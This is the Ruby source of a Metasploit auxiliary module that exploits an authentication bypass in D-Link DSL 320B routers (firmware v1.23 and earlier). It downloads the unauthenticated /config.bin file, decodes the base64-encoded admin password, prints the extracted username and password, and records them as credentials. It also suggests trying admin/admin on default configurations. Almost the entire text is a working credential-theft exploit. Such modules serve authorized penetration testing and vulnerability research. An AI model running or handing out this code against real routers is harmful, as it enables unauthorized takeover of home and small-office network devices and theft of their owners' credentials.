D-Link DSL 320B Password Extractor

### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Report  def initialize    super(      'Name' => 'D-Link DSL 320B Password Extractor',      'Description' => %q{          This module exploits an authentication bypass vulnerability in D-Link DSL 320B        <=v1.23. This vulnerability allows to extract the credentials for the remote        management interface.      },      'References' => [        [ 'EDB', '25252' ],        [ 'OSVDB', '93013' ],        [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-018' ]      ],      'Author' => [        'Michael Messner <devnull[at]s3cur1ty.de>'      ],      'License' => MSF_LICENSE    )  end  def run    vprint_status("#{rhost}:#{rport} - Trying to access the configuration of the device")    # download configuration    begin      res = send_request_cgi({        'uri' => '/config.bin',        'method' => 'GET'      })      return if res.nil?      return if (res.headers['Server'].nil? || res.headers['Server'] !~ (/micro_httpd/))      return if (res.code == 404)      if res.body =~ (/sysPassword value/) || res.body =~ (/sysUserName value/)        if res.body !~ /sysPassword value/          print_status("#{rhost}:#{rport} - Default Configuration of DSL 320B detected - no password section available, try admin/admin")        else          print_good("#{rhost}:#{rport} - Credentials successfully extracted")        end        # store all details as loot -> there is some useful stuff in the response        loot = store_loot('dlink.dsl320b.config', 'text/plain', rhost, res.body)        print_good("#{rhost}:#{rport} - Configuration of DSL 320B downloaded to: #{loot}")        user = ''        pass = ''        res.body.each_line do |line|          if line =~ %r{<sysUserName\ value="(.*)"/>}            user = ::Regexp.last_match(1)            next          end          next unless line =~ %r{<sysPassword\ value="(.*)"/>}          pass = ::Regexp.last_match(1)          pass = Rex::Text.decode_base64(pass)          print_good("#{rhost}:#{rport} - Credentials found: #{user} / #{pass}")          connection_details = {            module_fullname: fullname,            username: user,            private_data: pass,            private_type: :password,            workspace_id: myworkspace_id,            proof: line,            status: Metasploit::Model::Login::Status::UNTRIED          }.merge(service_details)          create_credential_and_login(connection_details)        end      end    rescue ::Rex::ConnectionError      vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")      return    end  endend